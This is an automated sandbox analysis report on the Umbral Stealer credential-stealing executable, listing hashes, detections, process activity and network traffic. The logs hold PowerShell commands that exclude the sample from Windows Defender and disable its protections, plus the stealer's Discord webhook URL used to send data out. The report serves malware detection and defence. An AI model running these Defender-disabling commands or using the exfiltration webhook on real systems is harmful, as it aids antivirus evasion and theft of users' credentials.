File name:

921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe

Full analysis: https://app.any.run/tasks/b243c9c9-d3a7-444d-a453-7dd06349a6ad
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Malware Trends Tracker     >>>
Analysis date: December 14, 2024, 12:04:15
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
evasion
discord
exfiltration
stealer
discordgrabber
generic
umbralstealer
ims-api
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
MD5:

85EADBE66E59F3512BFED3EDD076ED4C

SHA1:

3FAC3F7414BD4CED53BEB1D89402524A2B9CB510

SHA256:

921BA78EF5661EE885D93756F28F7E4DF163F1EA910AF6C68266F856B112CE76

SSDEEP:

3072:61zJQhGjtQmzAvpehGfSdcRCG28CLLRyZmqh7s2e9wgPQxY8e11sXE7B+WXgME6U:fpSdcXoLRah7teCgJ8e1mmNH

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Changes settings for reporting to Microsoft Active Protection Service (MAPS)

      • powershell.exe (PID: 440)

    • Changes settings for sending potential threat samples to Microsoft servers

      • powershell.exe (PID: 440)

    • Changes settings for real-time protection

      • powershell.exe (PID: 440)

    • Adds path to the Windows Defender exclusion list

      • 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe (PID: 5244)

    • Changes antivirus protection settings for downloading files from the Internet (IOAVProtection)

      • powershell.exe (PID: 440)

    • Changes settings for protection against network attacks (IPS)

      • powershell.exe (PID: 440)

    • Changes settings for checking scripts for malicious actions

      • powershell.exe (PID: 440)

    • UMBRALSTEALER has been detected (YARA)

      • 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe (PID: 5244)

    • Changes Controlled Folder Access settings

      • powershell.exe (PID: 440)

    • DISCORDGRABBER has been detected (YARA)

      • 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe (PID: 5244)

  • SUSPICIOUS

    • Reads the date of Windows installation

      • 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe (PID: 5880)

    • Reads security settings of Internet Explorer

      • 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe (PID: 5880)

    • Application launched itself

      • 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe (PID: 5880)

    • Script adds exclusion path to Windows Defender

      • 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe (PID: 5244)

    • Script disables Windows Defender's IPS

      • 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe (PID: 5244)

    • Starts POWERSHELL.EXE for commands execution

      • 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe (PID: 5244)

    • Checks for external IP

      • 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe (PID: 5244)
      • svchost.exe (PID: 2192)

    • Uses WMIC.EXE to obtain Windows Installer data

      • 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe (PID: 5244)

    • Accesses operating system name via WMI (SCRIPT)

      • WMIC.exe (PID: 5268)

    • Uses WMIC.EXE to obtain computer system information

      • 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe (PID: 5244)

    • Accesses product unique identifier via WMI (SCRIPT)

      • WMIC.exe (PID: 1580)

    • Uses WMIC.EXE to obtain operating system information

      • 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe (PID: 5244)

    • Script disables Windows Defender's real-time protection

      • 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe (PID: 5244)

    • Possible usage of Discord/Telegram API has been detected (YARA)

      • 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe (PID: 5244)

    • Accesses video controller name via WMI (SCRIPT)

      • WMIC.exe (PID: 936)

    • Uses WMIC.EXE to obtain a list of video controllers

      • 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe (PID: 5244)

    • The process connected to a server suspected of theft

      • 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe (PID: 5244)

  • INFO

    • Disables trace logs

      • 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe (PID: 5880)
      • 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe (PID: 5244)

    • Checks supported languages

      • 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe (PID: 5880)
      • 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe (PID: 5244)

    • Reads the computer name

      • 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe (PID: 5880)
      • 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe (PID: 5244)

    • Process checks computer location settings

      • 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe (PID: 5880)

    • Reads the machine GUID from the registry

      • 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe (PID: 5880)
      • 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe (PID: 5244)

    • The process uses the downloaded file

      • 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe (PID: 5880)

    • Reads Environment values

      • 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe (PID: 5880)
      • 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe (PID: 5244)

    • Checks proxy server information

      • 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe (PID: 5880)
      • 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe (PID: 5244)

    • Reads the software policy settings

      • 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe (PID: 5880)
      • 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe (PID: 5244)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 4388)
      • powershell.exe (PID: 440)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 4388)

    • Create files in a temporary directory

      • 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe (PID: 5244)

    • Reads security settings of Internet Explorer

      • WMIC.exe (PID: 5268)
      • WMIC.exe (PID: 1556)
      • WMIC.exe (PID: 1580)
      • WMIC.exe (PID: 936)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

ims-api

(PID) Process(5244) 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe
Discord-Webhook-Tokens (1)1312556972008145028/An6X2LqoEBGwtG4KSm9A-_wDz60gtfV86CSOYjRcWH6q5sc08jR3Zs83_jxxtsMadQe2
Discord-Info-Links
1312556972008145028/An6X2LqoEBGwtG4KSm9A-_wDz60gtfV86CSOYjRcWH6q5sc08jR3Zs83_jxxtsMadQe2
Get Webhook Infohttps://discord.com/api/webhooks/1312556972008145028/An6X2LqoEBGwtG4KSm9A-_wDz60gtfV86CSOYjRcWH6q5sc08jR3Zs83_jxxtsMadQe2
No Malware configuration.

TRiD

.exe | Generic CIL Executable (.NET, Mono, etc.) (56.7)
.exe | Win64 Executable (generic) (21.3)
.scr | Windows screen saver (10.1)
.dll | Win32 Dynamic Link Library (generic) (5)
.exe | Win32 Executable (generic) (3.4)

EXIF

EXE

AssemblyVersion: 1.0.0.0
ProductVersion: 1.0.0.0
ProductName: -
OriginalFileName: -
LegalTrademarks: -
LegalCopyright: -
InternalName: -
FileVersion: 1.0.0.0
FileDescription: -
CompanyName: -
Comments: Payload for Umbral Stealer
CharacterSet: Unicode
LanguageCode: Neutral
FileSubtype: -
ObjectFileType: Executable application
FileOS: Win32
FileFlags: (none)
FileFlagsMask: 0x003f
ProductVersionNumber: 1.0.0.0
FileVersionNumber: 1.0.0.0
Subsystem: Windows GUI
SubsystemVersion: 6
ImageVersion: -
OSVersion: 4
EntryPoint: 0x3b12e
UninitializedDataSize: -
InitializedDataSize: 2048
CodeSize: 233984
LinkerVersion: 48
PEType: PE32
ImageFileCharacteristics: Executable, Large address aware, 32-bit
TimeStamp: 2053:02:19 18:54:36+00:00
MachineType: Intel 386 or later, and compatibles
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
135
Monitored processes
17
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe #UMBRALSTEALER 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs svchost.exe wmic.exe no specs conhost.exe no specs wmic.exe no specs conhost.exe no specs wmic.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs wmic.exe no specs conhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
5880"C:\Users\admin\Desktop\921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe" C:\Users\admin\Desktop\921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Version:
1.0.0.0
Modules
Images
c:\users\admin\desktop\921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
5244"C:\Users\admin\Desktop\921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe" C:\Users\admin\Desktop\921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe
921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Version:
1.0.0.0
Modules
Images
c:\users\admin\desktop\921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
ims-api
(PID) Process(5244) 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe
Discord-Webhook-Tokens (1)1312556972008145028/An6X2LqoEBGwtG4KSm9A-_wDz60gtfV86CSOYjRcWH6q5sc08jR3Zs83_jxxtsMadQe2
Discord-Info-Links
1312556972008145028/An6X2LqoEBGwtG4KSm9A-_wDz60gtfV86CSOYjRcWH6q5sc08jR3Zs83_jxxtsMadQe2
Get Webhook Infohttps://discord.com/api/webhooks/1312556972008145028/An6X2LqoEBGwtG4KSm9A-_wDz60gtfV86CSOYjRcWH6q5sc08jR3Zs83_jxxtsMadQe2
4388"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\admin\Desktop\921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
3152\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
440"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
2380\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2192C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
5268"wmic.exe" os get CaptionC:\Windows\System32\wbem\WMIC.exe921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
WMI Commandline Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
3260\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exeWMIC.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1556"wmic.exe" computersystem get totalphysicalmemoryC:\Windows\System32\wbem\WMIC.exe921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
WMI Commandline Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
Total events
21 850
Read events
21 836
Write events
14
Delete events
0

Modification events

(PID) Process:(5880) 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(5880) 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(5880) 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(5880) 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(5880) 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(5880) 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(5880) 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(5880) 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(5880) 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASMANCS
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(5880) 921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
0
Suspicious files
2
Text files
6
Unknown types
0

Dropped files

PID
Process
Filename
Type
440powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ghbv2zpx.j3u.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4388powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_j25ag4nj.ewx.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4388powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_nxsnfljh.lak.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5728powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wbebcfog.5su.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
440powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_et3t3l0e.b3e.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5728powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_50n1plv0.qgx.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5244921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exeC:\Users\admin\AppData\Local\Temp\cQRnN4NjeCIkENA.ligmacompressed
MD5:76CDB2BAD9582D23C1F6F4D868218D6C
SHA256:8739C76E681F900923B900C9DF0EF75CF421D39CABB54650C4B9AD19B6A76D85
4388powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:A260B0E8269AC47DC66C9645597A67F7
SHA256:E22B1591A200004D0BA878C3594A62936BB13A73CF1CB33DCF53B09C935890B6
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
25
DNS requests
10
Threats
6

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
204
216.58.206.35:443
https://gstatic.com/generate_204
unknown
876
svchost.exe
GET
200
23.48.23.143:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
204
216.58.206.35:443
https://gstatic.com/generate_204
unknown
4712
MoUsoCoreWorker.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
23.48.23.143:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
876
svchost.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5244
921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe
GET
200
208.95.112.1:80
http://ip-api.com/json/?fields=225545
unknown
shared
POST
404
162.159.138.232:443
https://discord.com/api/webhooks/1312556972008145028/An6X2LqoEBGwtG4KSm9A-_wDz60gtfV86CSOYjRcWH6q5sc08jR3Zs83_jxxtsMadQe2
unknown
binary
45 b
whitelisted
POST
404
162.159.136.232:443
https://discord.com/api/webhooks/1312556972008145028/An6X2LqoEBGwtG4KSm9A-_wDz60gtfV86CSOYjRcWH6q5sc08jR3Zs83_jxxtsMadQe2
unknown
binary
45 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
876
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
192.168.100.255:137
whitelisted
4712
MoUsoCoreWorker.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
104.126.37.128:443
www.bing.com
Akamai International B.V.
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
5880
921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe
142.250.184.227:443
gstatic.com
GOOGLE
US
whitelisted
876
svchost.exe
23.48.23.143:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4712
MoUsoCoreWorker.exe
23.48.23.143:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5244
921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe
142.250.184.227:443
gstatic.com
GOOGLE
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
whitelisted
www.bing.com
  • 104.126.37.128
  • 104.126.37.186
  • 104.126.37.136
  • 104.126.37.123
  • 104.126.37.129
  • 104.126.37.162
  • 104.126.37.131
  • 104.126.37.161
  • 104.126.37.130
whitelisted
google.com
  • 142.250.185.174
whitelisted
gstatic.com
  • 142.250.184.227
whitelisted
crl.microsoft.com
  • 23.48.23.143
  • 23.48.23.156
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
ip-api.com
  • 208.95.112.1
shared
discord.com
  • 162.159.137.232
  • 162.159.138.232
  • 162.159.135.232
  • 162.159.128.233
  • 162.159.136.232
whitelisted
self.events.data.microsoft.com
  • 20.189.173.27
whitelisted

Threats

PID
Process
Class
Message
Device Retrieving External IP Address Detected
INFO [ANY.RUN] External IP Check (ip-api .com)
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com)
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup ip-api.com
Misc activity
ET INFO Observed Discord Domain in DNS Lookup (discord .com)
Misc activity
ET INFO Observed Discord Domain (discord .com in TLS SNI)
Successful Credential Theft Detected
STEALER [ANY.RUN] Attempt to exfiltrate via Discord
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
921ba78ef5661ee885d93756f28f7e4df163f1ea910af6c68266f856b112ce76.exe